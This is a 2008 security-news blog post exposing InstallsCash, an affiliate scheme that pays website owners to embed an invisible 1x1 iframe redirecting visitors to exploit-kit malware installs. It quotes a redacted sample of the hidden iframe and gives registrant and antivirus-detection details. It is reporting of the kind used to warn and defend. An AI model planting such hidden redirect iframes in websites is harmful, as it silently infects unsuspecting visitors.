Daily cyber threats and internet security news: network security, online safety and latest security alerts
March 31st, 2008

Infect Your Own Website Visitors For Russian Cash

InstallsCash partnership program offers the affiliates to put a short one line iframe code on their website pages. Next this hidden iframe would be used to silently redirect any visitor to another website to install via an MPack like process the affiliation program. Each successful installation made from the affiliate site would involve a payment.

To cover the tracks, the InstallsCash registrar is, of course, from China ( Fake registrant address is in the US (Iowa City) and the e-mail contact is a free webmail service that is popular in Russia ( Obviously, this email account name was randomly chosen.

Subscribers of this “program” will be offered a list of allowed systems of payments. These systems are the regular ones used by online criminals. Having done that, one will be asked to wait for 24 hours until account activation.

After this period a subscriber will receive the IFRAME code, something like:

<iframe src=”http://**************610.php” width=1 height=1></iframe>

The iframe has to be hidden on subscriber’s website and point to some another website, using a strange name randomly chosen and created using a more or less automated method. It seems the affiliator creates or uses a different one for each affiliate. Thanks to these unique names, the software recognizes each of them. Data can be feed into their stats page and then they can calculate the payments.

Basically, subscribers are paid for unique loads of InstallsCash IFRAME, which means that whoever signs up for InstallsCash and installs their code, is infecting and redirecting visitors of his website using this invisible iframe code.

InstallsCash distributer admits and warns: “…they will be updating every 3 days and they will be invisible for every antivirus!”

Registrar is and registrant contact came with another random e-mail address:

Jan Dendinger
Phone +1 3196433xxx Fax: +13.196433xxx
309 East Main Street
West Branch IA 523581

It seems that behind InstallCash, IframeCash (September 2006) and IframeDollars (November 2007) are hidden the same people. In November 2007, the RBNExploit blog discussed that iFrameCash and iFrameDollars were possibly linked to the Russian Business Network. This confirms that RBN trading partners are still in business.

McAfee VirusScan blocks and detects the PHP script as JS/Exploit-BO.gen. Some additional files are detected as Downloader-BDH.

Share this item with others:

More on CyberInsecure:
  • New Symbian OS Malware Silently Transfers Mobiles Account Credit
  • Restaurant Depot, Jetro Cash & Carry Processing System Compromised, Credit Cards Sold On Russian Blackmarket
  • Russian Citizens Database Is Now Online
  • Major League Baseball Website Infected Visitors Through Ads
  • Subdomain Compromised, Installing Malware On Visitors PC’s

  • If you found this information useful, consider linking to it from your own website.
    Just copy and paste the code below into your website (Ctrl+C to copy)
    It will look like this: Infect Your Own Website Visitors For Russian Cash

    One Response to “Infect Your Own Website Visitors For Russian Cash”

    1. PPI Iframe-EXploit MPack INSTALLSCASH russian cash – Black Hat Forum Says:
      April 3rd, 2008 at 7:14 am

      […] Interesting artikles about the company and how it works, you can find here:…-russian-cash/ (above middle of the blog) […]

    Leave a Reply

    Comments with unsolicited links to other resources will be marked as spam. DO NOT leave links in comments. Please leave your real email, it wont be published.

    To prove you’re a person (not a spam script), type the security word shown in the picture. Click on the picture to hear an audio file of the word.